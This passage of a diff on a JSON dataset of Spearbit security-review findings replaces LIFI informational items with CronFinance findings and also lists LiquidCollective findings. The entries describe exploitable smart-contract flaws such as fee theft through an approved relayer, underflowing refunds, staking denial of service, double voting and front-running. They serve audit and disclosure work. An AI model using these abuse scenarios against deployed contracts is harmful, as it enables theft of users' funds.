by attempting to deploy token pairs with and exploiting the admin address, either deploying the pool in a paused state, effectively disabling trading for long-term swaps with the pool, pausing the pool at an unknown point in the future, setting fee and holding penalty parameters to inappropriate values, or setting illegitimate arbitrage partners and lists. This requires the factory owner to remove the admin of each pool individually and to set a new admin address, fee parameters, holding periods, pause state, and arbitrage partners in order to recover each pool to a usable condition if the griefing is successful.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Robust allowance handling in maxApproveERC20()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Some tokens, like USDT, require setting the approval to 0 before setting it to another value. The function SafeERC20.safeIncreaseAllowance() doesn't do this. Luckily maxApproveERC20() sets the allowance so high that in practice this never has to be increased. function maxApproveERC20(...) ... { ... uint256 allowance = assetId.allowance(address(this), spender); if (allowance < amount) SafeERC20.safeIncreaseAllowance(IERC20(assetId), spender, MAX_UINT - allowance); }", + "title": "Refund Computation in _withdrawLongTermSwap Contains A Risky Underflow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Nothing prevents lastVirtualOrderBlock from advancing beyond the expiry of any given long-term swap, so the unchecked subtraction here is unsafe and can underflow. Since the resulting refund value will be extremely large due to the limited number of blocks that can elapse and the typical prices and decimals of tokens, the practical consequence will be a revert due to exceeding the pool and order balances. However, this could be used to steal funds if the value could be maliciously tuned, for example via another hypothetical bug that allowed the last virtual order block or the sales rate of an order to be manipulated to an arbitrary value.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Unused re-entrancy guard", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The RelayerCelerIM.sol#L21 includes a redundant re-entrancy guard, which adds an extra layer of protection against re-entrancy attacks. While re-entrancy guards are crucial for securing contracts, this particular guard is not used.", + "title": "Function transferJoinEvent Permits Transfer-to-Self", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Though the error code indicates the opposite intent, this check will permit transfer-to-self (|| used instead of &&).", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Redundant duplicate import in the LIFuelFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current LIFuelFacet.sol contains a redundant duplicate import. Identifying and removing dupli- cate imports can streamline the contract and improve maintainability.", + "title": "One-step owner change for factory owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The factory owner can be changed with a single transaction. As the factory owner is critical to managing the pool fees and other settings an incorrect address being set as the owner may result in unintended behaviors.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Extra checks in executeMessageWithTransfer()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function executeMessageWithTransfer() of RelayerCelerIM ignore the first parameter. seems this could be used to verify the origin of the transaction, which could be an extra security measure. It * @param * (unused) The address of the source app contract function executeMessageWithTransfer(address, ...) ... { }", + "title": "Factory owner may front run large orders in order to extract fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The factory owner may be able to front-run large trades in order to extract more fees if compromised or becomes malicious in one way or another. Similarly, pausing may also allow for skipping the execution of virtual orders before exiting.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Variable visibility is not uniform", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In the current facets, state variables like router/messenger visibilities are not uniform, with some variables declared as public while others are private. thorchainRouter => is defined as public. synapseRouter => is defined as public. deBridgeGate => is defined as private", + "title": "Join Events must be explicitly transfered to recipient after transfering Balancer Pool Tokens in order to realize the full value of the tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Any user receiving LP tokens transferred to them must be explicitly transferred with a join event in order to redeem the full value of the LP tokens on exit, otherwise the address transferred to will automatically get the holding penalty when they try to exit the pool. Unless a protocol specifically implements transferJoinEvent function compatibility all LP tokens going through that protocol will be worth a fraction of their true value even after the holding period has elapsed.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Library LibMappings not used everywhere", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The library LibMappings is used in several facets. However, it is not used in the following facets ReentrancyGuard AxelarFacet HopFacet.sol MultichainFacet OptimismBridgeFacet OwnershipFacet", + "title": "Order Block Intervals(OBI) and Max Intervals are calculated with 14 second instead of 12 second block times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The CronV1Pool contract calculates both the Order Block Intervals (OBI) and the Max Intervals of the Stable/Liquid/Volatile pairs with 14 second block times. However, after the merge, 12 second block time is enforced by the Beacon Chain.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "transferERC20() doesn't have a null address check for receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "LibAsset.transferFromERC20() has a null address check on the receiver, but transferERC20() does not.", + "title": "One-step status change for pool Admins", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Admin status can be changed in a single transaction. This may result in unintended behaviour if the incorrect address is passed.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "LibBytes can be improved", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The following functions are not used concat() concatStorage() equal() equalStorage() toBytes32() toUint128() toUint16() toUint256() toUint32() toUint64() toUint8() toUint96() The call to function slice() for calldata arguments (as done in AxelarExecutor) can be replaced with the in-built slicing provided by Solidity. Refer to its documentation.", + "title": "Incomplete token simulation in CronV1Pool due to missing queryJoin and queryExit functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "he CronV1Pool contract is missing the queryJoin and queryExit functions, which are significant for calculating maxAmountsIn and/or minBptOut on pool joins, and minAmountsOut and/or maxBptIn on pool exits, respectively. The ability to calculate these values is very important in order to ensure proper enforcement of slippage tolerances and mitigate the risk of sandwich attacks.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Keep generic errors in the GenericErrors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been noticed that some of the contracts are re-defined errors. The generic errors like a WithdrawFailed can be kept in the GenericErrors.sol", + "title": "A partner can trigger ROC update", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A partner can trigger rook update if they return rook's current list within an update. Scenario A partner calls updateArbitrageList, the IArbitrageurList(currentList).nextList() returns rook's rook- PartnerContractAddr and gets updated, the partner calls updateArbitrageList again, so this time isRook will be true.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Attention points for making the Diamond immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "There are additional attention points to decide upon when making the Diamond immutable: After removing the Owner, the following functions won't work anymore: AccessManagerFacet.sol - setCanExecute() AxelarFacet.sol - setChainName() HopFacet.sol - registerBridge() MultichainFacet.sol - updateAddressMappings() & registerRouters() OptimismBridgeFacet.sol - registerOptimismBridge() PeripheryRegistryFacet.sol - registerPeripheryContract() StargateFacet.sol - setStargatePoolId() & setLayerZeroChainId() WormholeFacet.sol - setWormholeChainId() & setWormholeChainIds() There is another authorization mechanism via LibAccess, which arranges access to the functions of DexManagerFacet.sol WithdrawFacet.sol Several Periphery contracts also have an Owner: AxelarExecutor.sol ERC20Proxy.sol Executor.sol FeeCollector.sol Receiver.sol RelayerCelerIM.sol ServiceFeeCollector.sol Additionally ERC20Proxy has an authorization mechanism via authorizedCallers[]", + "title": "Approved relayer can steal cron's fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A relayer within Balancer is set per vault per address. If feeAddr will ever add a relayer within the balancer vault, the relayer can call exitPool with a recipient of their choice, and the check on line 225 will pass as the sender will still be feeAddr but the true msg.sender is the relayer.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Check on the final asset in _swapData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "MakerTeleportFacet verifies that the final received asset in _swapData is DAI. This check is not present in majority of the facets (including CircleBridgeFacet). Ideally, every facet should have the check that the final receivingAssetId is equal to sendingAssetId.", + "title": "Price Path Due To Long-Term Orders Neglected In Oracle Updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The _updateOracle() function takes its price sample as the final price after virtual order execution for whatever time period has elapsed since the last join/exit/swap. Since the price changes continuously during that interval if there are long-term orders active (unlike in Uniswap v2 where the price is constant between swaps), this is inaccurate - strictly speaking, one should integrate over the price curve as defined by LT orders to get a correct sample. The longer the interval, the greater the potential for inaccuracy.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Discrepancies in pragma versioning across faucet implementations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The use of different pragma versions in facet implementations can present several implications, with potential risks and compliance concerns that need to be addressed to maintain robust and compliant contracts.", + "title": "Vulnerabilities noted from npm audit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "npm audit notes: 76 vulnerabilities (5 low, 16 moderate, 27 high, 28 critical).", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Inconsistent use of validateDestinationCallFlag()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Highlighted code can be replaced with a call to validateDestinationCallFlag() function as done in other Facets.", + "title": "Optimization: Merge CronV1Pool.sol & VirtualOrders.sol (Changes from dev team added to audit.)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A lot of needless parameter passing is done to accommodate the file barrier between CronV1Pool & VirtualOrdersLib, which is an internal library. Some parameters are actually immutable variables.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Inconsistent utilization of the isNativeAsset function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The isNativeAsset function is designed to distinguish native assets from other tokens within facet- based smart contract implementations. However, it has been observed that the usage of the isNativeAsset function is not consistent across various facets. Ensuring uniform application of this function is crucial for maintaining the accuracy and reliability of the asset identification and processing within the facets.", + "title": "Receive sorted tokens at creation to reduce complexity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Currently, when a pool is created, within the constructor, logic is implemented to determine if the to- kens are sorted by address. A requirement that is needed for Balancer Pool creation. This logic adds unnecessary gas consumption and complexity throughout the contract as every time amounts are retrieved from balancer, the Cron Pool must check the order of the tokens and make sure that the difference between sorted (Balancer) and unsorted (Cron) token addresses is handled. An example can be seen in onJoinPool uint256 token0InU112 = amountsInU112[TOKEN0_IDX]; uint256 token1InU112 = amountsInU112[TOKEN1_IDX]; Where the amountsInU112 are retrieved from the balancer as a sorted array, index 0 == token0 and index 1 == token1, but on the Cron side, we must make sure that we retrieved the correct amount based on the tokens being sent as sorted or not when the pool was created.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Unused events/errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The contracts contain several events and error messages that are not used anywhere in the contract code. These unused events and errors add unnecessary code to the contract, increasing its size.", + "title": "Remove double reentrancy checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A number of CronV1Pool functions include reentrancy checks, however, they are only callable from a Balancer Vault function that already has a reentrancy check.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Make bridge parameters dynamic by keeping them as a parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current implementation has some bridge parameters hardcoded within the smart contract. This approach limits the flexibility of the contract and may cause issues in the future when upgrades or changes to the bridge parameters are required. It would be better to keep the bridge parameters as a parameter to make them dynamic and easily changeable in the future. HopFacetOptimized.sol => Relayer & RelayerFee MakerTeleportFacet.sol's => Operator person (or specified third party) responsible for initiating minting process on destination domain by providing (in the fast path) Oracle attestations.", + "title": "TWAMM Formula Computation Can Be Made Correct-By-Construction and Optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The linked lines are the core calculation of TWAMM virtual order execution. They involve checked arithmetic in the form of underflow-checked subtractions; there is thus a theoretical risk that rounding error could lead to a \"freezing\" of a TWAMM pool. One of the subtractions, that for token1OutU112, is already \"correct-by- construction\", i.e. it can never underflow. The calculation of token0OutU112 can be reformulated to be explicitly safe as well; the following overall refactoring is suggested: uint256 ammEndToken0 = (token1ReserveU112 * sum0) / sum1; uint256 ammEndToken1 = (token0ReserveU112 * sum1) / sum0; token0ReserveU112 = ammEndToken0; token1ReserveU112 = ammEndToken1; token0OutU112 = sum0 - ammEndToken0; token1OutU112 = sum1 - ammEndToken1; Both output calculations are now of the form x (cid:0) (x (cid:3) y)=(y + z) for non-negative x, y , and z, allowing subtraction operations to be unchecked, which is both a gas optimization and gives confidence the calculation cannot freeze up unexpectedly due to an underflow. Replacement of divDown by / gives equivalent semantics with lower overhead. An additional advantage of this formulation is its manifest symmetry under 0 < (cid:0) > 1 interchange; this serves as a useful heuristic check on the computation, as it should possess the same symmetry as the invariant.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The highlighted comment incorrectly refers USDC address as DAI address.", + "title": "Gas Optimizations In Bit Packing Functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The bit packing operations are heavily used throughout the gas-critical swap code path, the opti- mization of which was flagged as high-priority by the CronFi team. Thus they were carefully reviewed not just for correctness, but also for gas optimization. L119: unnecessary & due to check on L116 L175: could hardcode clearMask L203: could hardcode clearMask L240: could hardcode clearMask L241: unnecessary & due to check on line 237 L242: unnecessary & due to check on line 238 L292: could hardcode clearMask L328: could hardcode clearMask L343: unnecessary to mask when _isWord0 == true L359: unnecessary & operations due to checks on lines 356 and 357 L372: unnecessary masking L389: could hardcode clearMask L390: unnecessary & due to check on L387 L415: could 16 hardcode clearMask L416: unnecessary & operation due to check on line 413 L437: unnecessary clearMask L438: unnecessary & due to check on line 435 L464: could hardcode clearMask L465: unnecessary & due to check on line 462 Additionally, the following code pattern appears in multiple places: requireErrCode(increment <= CONST, CronErrors.INCREMENT_TOO_LARGE); value += increment; requireErrCode(value <= CONST, CronErrors.OVERFLOW); Unless there's a particular reason to want to detect a too-large increment separately from an overflow, these patterns could all be simplified to requireErrCode(CONST - value >= increment, CronErrors.OVERFLOW); value += increment; as any increment greater than CONST will cause overflow anyway and value is always in the correct range by construction. This allows CronErrors.INCREMENT_TOO_LARGE to be removed as well.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Redundant console log", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The contract includes Console.sol from test file, which is only used for debugging purposes. In- cluding it in the final version of the contract can increase the contract size and consume more gas, making it more expensive to deploy and execute.", + "title": "Using extra storage slot to store two mappings of the same information", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A second storage slot is used to store a duplicate mapping of the same token pair but in reverse order. If the tokens are sorted in a getter function then the second mapping does not need to be used.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "SquidFacet doesn't revert for incorrect routerType", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "If _squidData.routeType passed by the user doesn't match BridgeCall, CallBridge, or Call- BridgeCall, SquidFacet just takes the funds from the user and returns without calling the bridge. This, when the combined with the issue \"Max approval to any address is possible\", lets anyone steal those funds. Note: Solidity enum checks should prevent this issue, but it is safer to do an extra check.", + "title": "Gas optimizations within _executeVirtualOrders function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Within the _executeVirtualOrders function there are a few gas optimizations that can be applied to reduce the contract size and gas consumed while the function is called. (!(virtualOrders.lastVirtualOrderBlock < _maxBlock && _maxBlock < block.number)) Is equivalent with: (virtualOrders.lastVirtualOrderBlock >= _maxBlock || _maxBlock >= block.number) This means that this always enters if _maxBlock == block.number which will result in unnecessary gas consump- tion. If cron fee is enabled, evoMem.feeShiftU3 will have a value meaning that the check on line 1536 is obsolete. Removing that check and the retrieve from storage will save gas.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Operators._hasFundableKeys returns true for operators that do not have fundable keys", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Because _hasFundableKeys uses operator.stopped in the check, an operator without fundable keys be validated and return true. Scenario: Op1 has keys = 10 limit = 10 funded = 10 stopped = 10 This means that all the keys got funded, but also \"exited\". Because of how _hasFundableKeys is made, when you call _hasFundableKeys(op1) it will return true even if the operator does not have keys available to be funded. By returning true, the operator gets wrongly included in getAllFundable returned array. That function is critical because it is the one used by pickNextValidators that picks the next validator to be selected and stake delegate user ETH. Because of this issue in _hasFundableKeys also the issue OperatorsRegistry._getNextValidatorsFromActive- Operators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) can happen DOSing the contract that will always make pickNextValidators return empty. Check Appendix for a test case to reproduce this issue.", + "title": "Initializing with default value is consuming unnecessary gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Every variable declaration followed by initialization with a default value is gas consuming and obso- lete. The provided line within the context is just an example.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Critical Risk" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "This issue is also related to OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator . Consider a scenario where we have Op at index 0 name op1 active true limit 10 funded 10 stopped 10 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 In this case, Op1 got all 10 keys funded and exited. Because it has keys=10 and limit=10 it means that it has no more keys to get funded again. Op2 instead has still 10 approved keys to be funded. Because of how the selection of the picked validator works uint256 selectedOperatorIndex = 0; for (uint256 idx = 1; idx < operators.length;) { if ( operators[idx].funded - operators[idx].stopped < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped ) { selectedOperatorIndex = idx; } unchecked { ++idx; } } When the function finds an operator with funded == stopped it will pick that operator because 0 < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped. After the loop ends, selectedOperatorIndex will be the index of an operator that has no more validators to be funded (for this scenario). Because of this, the following code uint256 selectedOperatorAvailableKeys = Uint256Lib.min( operators[selectedOperatorIndex].keys, operators[selectedOperatorIndex].limit ) - operators[selectedOperatorIndex].funded; when executed on Op1 it will set selectedOperatorAvailableKeys = 0 and as a result, the function will return return (new bytes[](0), new bytes[](0));. 13 In this scenario when stopped==funded and there are no keys available to be funded (funded == min(limit, keys)) the function will always return an empty result, breaking the pickNextValidators mechanism that won't be able to stake user's deposited ETH anymore even if there are operators with fundable validators. Check the Appendix for a test case to reproduce this issue.", + "title": "Factory requirement can be circumvented within the constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The constructor checks if the _factory parameter is the msg.sender. This behavior was, at first, created so that only the factory would be able to deploy pools. The check on line 484 is obsolete as pools deployed via the factory, will always have msg.sender == factory address, making the _factory parameter obsolete as well.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Critical Risk" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Oracle.removeMember could, in the same epoch, allow members to vote multiple times and other members to not vote at all", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of removeMember is introducing an exploit that allows an oracle member to vote again and again (in the same epoch) and an oracle that has never voted is prevented from voting (in the same epoch). Because of how OracleMembers.deleteItem is implemented, it will swap the last item of the array with the one that will be deleted and pop the last element. Let's make an example: 1) At T0 m0 to the list of members members[0] = m0. 2) At T1 m1 to the list of members members[1] = m1. 3) At T3 m0 call reportBeacon(...). By doing that, ReportsPositions.register(uint256(0)); will be called, registering that the member at index 0 has registered the vote. 4) At T4, the oracle admin call removeMember(m0). This operation, as we said, will swap the member's address from the last position of the array of members with the position of the member that will be deleted. After doing that will pop the last position of the array. The state changes from members[0] = m0; members[1] = m1 to members[0] = m1;. At this point, the oracle member m1 will not be able to vote during this epoch because when he/she will call reportBeacon(...) the function will enter inside the check. if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(_epochId, msg.sender); } This is because int256 memberIndex = OracleMembers.indexOf(msg.sender); will return 0 (the position of the m0 member that have already voted) and ReportsPositions.get(uint256(0)) will return true. At this point, if for whatever reason an admin of the contract add again the deleted oracle, it would be added to the position 1 of the array of the members, allowing the same member that have already voted, to vote again. Note: while the scenario where a removed member can vote multiple time would involve a corrupted admin (that would re-add the same member) the second scenario that prevent a user to vote would be more common. Check the Appendix for a test case to reproduce this issue. 14", + "title": "Usability: added remove, set pool functionality to CronV1PoolFactory (Changes from dev team added to audit.)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Conversations with the audit team indicated functions were needed to manage pool mappings post- creation in the event that a pool needed to be deprecated or replaced.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: High Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Order of calls to removeValidators can affect the resulting validator keys set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If two entities A and B (which can be either the admin or the operator O with the index I) send a call to removeValidators with 2 different set of parameters: T1 : (I, R1) T2 : (I, R2) Then depending on the order of transactions, the resulting set of validators for this operator might be different. And since either party might not know a priori if any other transaction is going to be included on the blockchain after they submit their transaction, they don't have a 100 percent guarantee that their intended set of validator keys are going to be removed. This also opens an opportunity for either party to DoS the other party's transaction by frontrunning it with a call to remove enough validator keys to trigger the InvalidIndexOutOfBounds error: OperatorsRegistry.1.sol#L324-L326: if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } to removeValidators and compare it", + "title": "Virtual oracle getter--gets oracle value at block > lvob (Changes from dev team added to audit.)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Through the audit process, sufficient contract space became available to add an oracle getter con- venience that returns the oracle values and timestamps. However, this leaves the problem of not being able to get the oracle price at the current block in a pool with low volume but virtual orders active.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: High Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Non-zero operator.limit should always be greater than or equal to operator.funded", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "For the subtraction operation in OperatorsRegistry.1.sol#L428-L430 to not underflow and revert, there should be an assumption that operators[selectedOperatorIndex].limit >= operators[selectedOperatorIndex].funded Perhaps this is a general assumption, but it is not enforced when setOperatorLimits is called with a new set of limits.", + "title": "Loss of assets due to rounding during _longTermSwap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "When a long term swap (LT) is created, the selling rate for that LT is set based on the amount and the number of blocks that order will be traded for. uint256 lastExpiryBlock = block.number - (block.number % ORDER_BLOCK_INTERVAL); uint256 orderExpiry = ORDER_BLOCK_INTERVAL * (_orderIntervals + 1) + lastExpiryBlock; // +1 protects from div 0 ,! uint256 tradeBlocks = orderExpiry - block.number; uint256 sellingRateU112 = _amountInU112 / tradeBlocks; During the computation of the number of blocks, the order must trade for, defined as tradeBlocks, the order expiry is computed from the last expiry block based on the OBI (Order Block Interval). If tradeBlocks is big enough (it can be a max of 176102 based on the STABLE_MAX_INTERVALS ), then sellingRa- teU112 will suffer a loss due to solidity rounding down behavior. This is a manageable loss for tokens with big decimals but for tokens with low decimals, will create quite an impact. E.g. wrapped BTC has 8 decimals. the MAX_ORDER_INTERVALS can be max 176102 as per stable max intervals defined within the constants. that being said a user can lose quite a significant value of BTC: 0.00176101 This issue is marked as Informational severity as the amount lost might not be that significant. This can change in the future if the token being LTed has a big value and a small number of decimals.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: High Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Assume there are 2 groups of oracle members A, B where they have voted for report variants Va and Vb respectively. Let's also assume the count for these variants Ca and Cb are equal and are the highest variant vote counts among all possible variants. If the Oracle admin changes the quorum to a number less than or equal to Ca + 1 = Cb + 1, any oracle member can backrun this transaction by the admin to decide which report variant Va or Vb gets pushed to the River. This is because when a lower quorum is submitted by the admin and there exist two variants that have the highest number of votes, in the _getQuorumReport function the returned isQuorum parameter would be false since repeat == 0 is false: Oracle.1.sol#L369: return (maxval >= _quorum && repeat == 0, variants[maxind]); Note that this issue also exists in the commit hash 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 and can be triggered by the admin either by calling setQuorum or addMember when the abovementioned conditions are met. Also, note that the free oracle member agent can frontrun the admin transaction to decide the quorum earlier in the scenario above. Thus this way _getQuorumReport would actually return that it is a quorum.", + "title": "Inaccuracies in Comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A number of minor inaccuracies were discovered in comments that could impact the comprehensi- bility of the code to future maintainers, integrators, and extenders. [1] bit-0 should be bit-1 [2] less than should be at most [3] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [4] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [5] on these lines unsold should be sold [6] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop 19 on line 54. [7] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 111. [8] omitted should be emitted", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "_getNextValidatorsFromActiveOperators can be tweaked to find an operator with a better validator pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Assume for an operator: (A, B) = (funded - stopped, limit - funded) The current algorithm finds the first index in the cached operators array with the minimum value for A and tries to gather as many publicKeys and signatures from this operator's validators up to a max of _requestedAmount. But there is also the B cap for this amount. And if B is zero, the function returns early with empty arrays. Even though there could be other approved and non-funded validators from other operators. 